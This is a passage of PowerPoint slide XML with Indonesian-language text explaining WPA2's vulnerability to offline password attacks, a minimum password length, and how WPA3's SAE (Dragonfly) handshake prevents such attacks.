              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jabat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WPA2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Nb. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Wi-Fi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>terbukti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kamus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> brute force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Setidaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>, kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>terdiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>setidaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> 14 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>karakter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pembobolan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> WPA3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WPA3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>stasiun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, WPA3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyetujui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Skema yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pertukaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Kata Sandi (PAKE). Pada WPA3, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Simultaneous Authentication of Equals (SAE) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggantikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jabat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbukti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. SAE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jabat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Dragonfly, yang pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Diffie-Hellman </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perjanjian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kurva</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elips</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikombinasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berasal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SAE, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seharusnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengendus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jabat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> brute force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kamus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> offline </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dragonfly juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>depan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> label yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
